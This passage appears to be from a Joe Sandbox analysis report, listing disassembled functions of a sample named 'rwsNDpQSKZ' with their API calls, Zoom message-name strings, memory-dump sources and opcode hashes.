                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C6E9D5,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,?,?,selectNotFoundDevice,?,?,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,00009DD6,deviceID,deviceType,selectNotFoundDevice,channelName), ref: 00C8EB15
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,00000048,00C6E9D5,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,?,?,selectNotFoundDevice,?,?,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,00009DD6,deviceID,deviceType,selectNotFoundDevice), ref: 00C8EB52
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,00000048,00C6E9D5,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,?,?,selectNotFoundDevice,?,?,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,00009DD6,deviceID), ref: 00C8EB82
                • EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,-00000004,?,00000048,00C6E9D5,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,?,?,selectNotFoundDevice,?,?,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request), ref: 00C8EC12
                • LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,-00000004,?,00000048,00C6E9D5,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,?,?,selectNotFoundDevice), ref: 00C8EC2F
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,-00000004,?,00000048,00C6E9D5,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,?,?,selectNotFoundDevice,?,?,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,00009DD6,deviceID,deviceType), ref: 00C8EC42
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: channelName$deviceID$deviceType$signalType
                • API String ID: 1443623190-2335052125
                • Opcode ID: 8fb2a1ea71c4441f791dbea3fc7d44fec7991b5ae94b5dfaa37cecd7340692c8
                • Instruction ID: 4f7cfa346527ffd10c1360b5eeb6df88eae2b1c5ac55df8c4d1c28ee76657250
                • Opcode Fuzzy Hash: 8fb2a1ea71c4441f791dbea3fc7d44fec7991b5ae94b5dfaa37cecd7340692c8
                • Instruction Fuzzy Hash: C641C075E003189BCF15EFA4C9456DDB7B4AF54309F048118EC12AB391DF70DA8ADBA9
                Function 00C960A0 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 110COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C960A7
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C76DB6), ref: 00C960BB
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.conf.start.download.component,00000044), ref: 00C960ED
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?), ref: 00C9612A
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.conf.start.download.component,?), ref: 00C9615C
                • EnterCriticalSection.KERNEL32(00000044), ref: 00C961CE
                • LeaveCriticalSection.KERNEL32(00000044,?), ref: 00C961EB
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?), ref: 00C961FE
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: com.Zoom.conf.start.download.component$componentType$isForce$requestID
                • API String ID: 1443623190-4212277253
                • Opcode ID: 953104545100a554c0c3cbfdcebd99d719110a08995e733928d5b4ce52d6db69
                • Instruction ID: dc3910d2b56008aba656cc5ba25ff0aa80a0b1ee76ead4caee86f48b6a2cd23f
                • Opcode Fuzzy Hash: 953104545100a554c0c3cbfdcebd99d719110a08995e733928d5b4ce52d6db69
                • Instruction Fuzzy Hash: A941C174E007199BCF14EFA4D9496DDB7B0AF44315F044128EC12A73D2DF709A8ADBA9
                Function 00C92071 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 110COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C92078
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C71406), ref: 00C9208C
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.dc.doc2img.convert.finish,00000044), ref: 00C920BE
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?), ref: 00C920FB
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.dc.doc2img.convert.finish,?), ref: 00C9212D
                • EnterCriticalSection.KERNEL32(00000044), ref: 00C9219F
                • LeaveCriticalSection.KERNEL32(00000044,?), ref: 00C921BC
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?), ref: 00C921CF
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: ConvertContext$PageNumSuccess$RetCode$com.zoom.app.dc.doc2img.convert.finish
                • API String ID: 1443623190-1549264759
                • Opcode ID: 780b3947ce7bae5a23883634a71b30b1086261e19c9973013a834d713d801d37
                • Instruction ID: e39bb961db0fe10c047608898ffbdf95214a9d2c90ad892d47b137486ba5536a
                • Opcode Fuzzy Hash: 780b3947ce7bae5a23883634a71b30b1086261e19c9973013a834d713d801d37
                • Instruction Fuzzy Hash: AE41A079E00708ABCF14EFA4D8496DDBBB5AF44315F044118E812B7391DF709E8ADB69
                Function 00C96212 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 110COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C96219
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C76F86), ref: 00C9622D
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.notify.component.download_result,00000044), ref: 00C9625F
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?), ref: 00C9629C
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.notify.component.download_result,?), ref: 00C962CE
                • EnterCriticalSection.KERNEL32(00000044), ref: 00C96340
                • LeaveCriticalSection.KERNEL32(00000044,?), ref: 00C9635D
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?), ref: 00C96370
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: com.Zoom.app.notify.component.download_result$componentType$reason$success
                • API String ID: 1443623190-3513881105
                • Opcode ID: 812546c4a3920a7e0c29d29c7b1fa7506f56f1848d19c5a38deb533fa49fb080
                • Instruction ID: 15992f595f8a2bc44ace37ce97855a060261b6105d2e809244134cc55a55a03a
                • Opcode Fuzzy Hash: 812546c4a3920a7e0c29d29c7b1fa7506f56f1848d19c5a38deb533fa49fb080
                • Instruction Fuzzy Hash: 7841C074D007089BCF14EFA4D84A6DDB7B0BF48315F044129E812A73D1DF709A8ADB69
                Function 00C923FF Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 110COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C92406
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C71A06), ref: 00C9241A
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.vdi.plugin.info,00000044), ref: 00C9244C
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?), ref: 00C92489
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.vdi.plugin.info,?), ref: 00C924BB
                • EnterCriticalSection.KERNEL32(00000044), ref: 00C9252D
                • LeaveCriticalSection.KERNEL32(00000044,?), ref: 00C9254A
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?), ref: 00C9255D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: Status$TroubleCode$Version$com.zoom.app.vdi.plugin.info
                • API String ID: 1443623190-2994386332
                • Opcode ID: 8027d505ef6c7b37de57c633af14c582282165348136c1003e446140d5b71b0f
                • Instruction ID: 85fdc66ff0f936ec3f4c94a1f6f50c4fb0a4aee4511b4883d20257dce6a7a842
                • Opcode Fuzzy Hash: 8027d505ef6c7b37de57c633af14c582282165348136c1003e446140d5b71b0f
                • Instruction Fuzzy Hash: F241C375D00308ABCF14EFA4D859ADDB7B4AF48315F044118E812A7391DF70DB8ADBA9
                Function 00C8E390 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 110COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C8E397
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6DF46), ref: 00C8E3AB
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.sip.switch.call.to.carrier.response,00000044), ref: 00C8E3DD
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?), ref: 00C8E41A
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.sip.switch.call.to.carrier.response,?), ref: 00C8E44C
                • EnterCriticalSection.KERNEL32(00000044), ref: 00C8E4BE
                • LeaveCriticalSection.KERNEL32(00000044,?), ref: 00C8E4DB
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?), ref: 00C8E4EE
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: CallID$ErrorCode$Result$com.zoom.app.assistant.sip.switch.call.to.carrier.response
                • API String ID: 1443623190-2471108270
                • Opcode ID: a5672747d9b416e69a01abd67de28251a2867774a7f96c291d78acbb1a85949c
                • Instruction ID: 47477c406093de29617ebbaf21490f8362f03cb52f12e1b43db63e55d6c9b761
                • Opcode Fuzzy Hash: a5672747d9b416e69a01abd67de28251a2867774a7f96c291d78acbb1a85949c
                • Instruction Fuzzy Hash: 30410535E003059FCF24EFA4C9456DDBBB4AF84319F048118F826A7381DF709A8ADB69
                Function 00C9074D Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 110COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C90754
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6FCD6), ref: 00C90768
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.broadcast.unbind.audio.from.txchannel.request,00000044), ref: 00C9079A
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?), ref: 00C907D7
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.broadcast.unbind.audio.from.txchannel.request,?), ref: 00C90809
                • EnterCriticalSection.KERNEL32(00000044), ref: 00C9087B
                • LeaveCriticalSection.KERNEL32(00000044,?), ref: 00C90898
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?), ref: 00C908AB
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: com.zoom.app.assistant.broadcast.unbind.audio.from.txchannel.request$signalType$sourceType$userID
                • API String ID: 1443623190-3591679833
                • Opcode ID: 39cd71fedc497e9576488d7fbe52dcc895449bb85e8c11050c52e3b338e11b59
                • Instruction ID: 5c3e5b010f905f41a05b3a305b5c54e4ab5413b10a86752721a62ba9fb07f79f
                • Opcode Fuzzy Hash: 39cd71fedc497e9576488d7fbe52dcc895449bb85e8c11050c52e3b338e11b59
                • Instruction Fuzzy Hash: 8741D275E007049FCF14EFA4C84A6DDB7B4AF44315F144128E812A73D1DF709A8AEBA9
                Function 00C86757 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 110COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C8675E
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C68906), ref: 00C86772
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.pt.upload.feedback,00000044), ref: 00C867A4
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?), ref: 00C867E1
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.pt.upload.feedback,?), ref: 00C86813
                • EnterCriticalSection.KERNEL32(00000044), ref: 00C86885
                • LeaveCriticalSection.KERNEL32(00000044,?), ref: 00C868A2
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?), ref: 00C868B5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: AdditionalInfo$MsgID$Options$com.Zoom.app.pt.upload.feedback
                • API String ID: 1443623190-506818149
                • Opcode ID: de5cc88ffdd57cb1975eb2294340751dab10f2db39e1f7875b5ba6a1105354d2
                • Instruction ID: 2ffb9699f80ae78d72f6765cfeeb3a5c258b622a7f606e22a011e48efcda3526
                • Opcode Fuzzy Hash: de5cc88ffdd57cb1975eb2294340751dab10f2db39e1f7875b5ba6a1105354d2
                • Instruction Fuzzy Hash: 0241CE74E007089BCF14EFA4D8496DDB7B0AF44319F044128EC12A73C1DF709A8ADBA9
                Function 00C96765 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 110COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C9676C
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C77346), ref: 00C96780
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.pt.start.whiteboard.share,00000044), ref: 00C967B2
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?), ref: 00C967EF
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.pt.start.whiteboard.share,?), ref: 00C96821
                • EnterCriticalSection.KERNEL32(00000044), ref: 00C96893
                • LeaveCriticalSection.KERNEL32(00000044,?), ref: 00C968B0
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?), ref: 00C968C3
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: b_make_permanent$com.Zoom.app.pt.start.whiteboard.share$doc_id$sharing_role
                • API String ID: 1443623190-495026792
                • Opcode ID: 59b236a98dea979111fe67304f8eefa27ed8b43124792dbbacf92db9037ec8b7
                • Instruction ID: 71b02068bb2fde9ad6230720a62ed198e4767854cbedb4fa41eb55711e0c6944
                • Opcode Fuzzy Hash: 59b236a98dea979111fe67304f8eefa27ed8b43124792dbbacf92db9037ec8b7
                • Instruction Fuzzy Hash: 3241CF74E007089BCF14EFB4D849ADDB7B5AF44315F044128E812AB3D1DF709A8ADBA9
                Function 00C94700 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 110COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C94707
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C75176), ref: 00C9471B
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.notify.pt.feedback.info,00000044), ref: 00C9474D
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?), ref: 00C9478A
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.notify.pt.feedback.info,?), ref: 00C947BC
                • EnterCriticalSection.KERNEL32(00000044), ref: 00C9482E
                • LeaveCriticalSection.KERNEL32(00000044,?), ref: 00C9484B
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?), ref: 00C9485E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
